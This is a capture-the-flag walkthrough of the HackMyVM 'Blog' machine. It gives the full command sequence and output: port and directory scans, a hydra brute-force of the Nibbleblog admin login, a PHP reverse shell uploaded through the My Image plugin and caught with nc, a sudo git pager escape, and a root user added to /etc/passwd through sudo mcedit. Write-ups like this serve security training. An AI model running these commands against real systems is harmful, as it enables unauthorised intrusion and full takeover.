HackMyVm Blog Walkthrough
Scan ports.
nmap -sV -sC -p- -oN port.log 192.168.56.100
Nmap scan report for furious.hmv (192.168.56.100)
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
| 256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
|_ 256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan port 80.
~/D/blog $gobuster dir -u "http://192.168.56.100" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log 08:24:24
===============================================================
/index.php (Status: 200) [Size: 271]
/my_weblog (Status: 301) [Size: 320] [--> http://192.168.56.100/my_weblog/]Scan my_weblog folder.
/content (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/content/]
/themes (Status: 301) [Size: 315] [--> http://blog.hmv/my_weblog/themes/]
/feed.php (Status: 200) [Size: 993]
/admin (Status: 301) [Size: 314] [--> http://blog.hmv/my_weblog/admin/]
/admin.php (Status: 200) [Size: 1395]
/index.php (Status: 200) [Size: 4303]
/plugins (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/plugins/]
/README (Status: 200) [Size: 902]
/languages (Status: 301) [Size: 318] [--> http://blog.hmv/my_weblog/languages/]
/LICENSE.txt (Status: 200) [Size: 35148]
/COPYRIGHT.txt (Status: 200) [Size: 1271]README shows it's Nibbleblog.
~/D/blog $curl "http://192.168.56.100/my_weblog/README"
====== Nibbleblog ======
Version: Beta on Github
Codename:
Release date:
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
...Add blog.hmv to /etc/hosts.
Brute force credentials of admin.
~/D/blog $hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 blog.hmv http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect" -f -I
...
[80][http-post-form] host: blog.hmv login: admin password: xxxxxx
...Search exploit of Nibble
~/D/blog $searchsploit Nibbleblog 08:33:16
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload ( | php/remote/38489.rb
------------------------------------------- ---------------------------------The upload module in Metasploit does no work, but we can do it by hand.
Upload reverse shell php in control Admin Panel-->Myimage Plugin, then get rev shell.
~/D/blog $curl "http://blog.hmv/my_weblog/content/private/plugins/my_image/image.php"
─────────────────────────────────────────────────────────────────────────────────────────
~/D/blog $nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.151] from (UNKNOWN) [192.168.56.100] 54256
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
15:30:47 up 4:34, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Following step are easy. Check sudo -l of www-data, and escalate to user admin.
www-data@blog:/var/www/html/my_weblog$ sudo -l
...
User www-data may run the following commands on blog:
(admin) NOPASSWD: /usr/bin/git
www-data@blog:/var/www/html/my_weblog$ sudo -u admin git -p help config
:!/bin/bash
admin@blog:/var/www/html/my_weblog$ id
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@blog:/var/www/html/my_weblog$ Then we can upload id_rsa.pub and get ssh login, if you want.
Check sudo -l of admin.
admin@blog:~$ sudo -l
sudo: unable to resolve host blog: Temporary failure in name resolution
Matching Defaults entries for admin on blog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User admin may run the following commands on blog:
(root) NOPASSWD: /usr/bin/mceditUse mcedit to edit /etc/passwd, add new root user and password:<code>root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash , and we can get root.
admin@blog:~$ su root2
Password:
root@blog:/home/admin# id;hostname
uid=0(root) gid=0(root) groups=0(root)
blog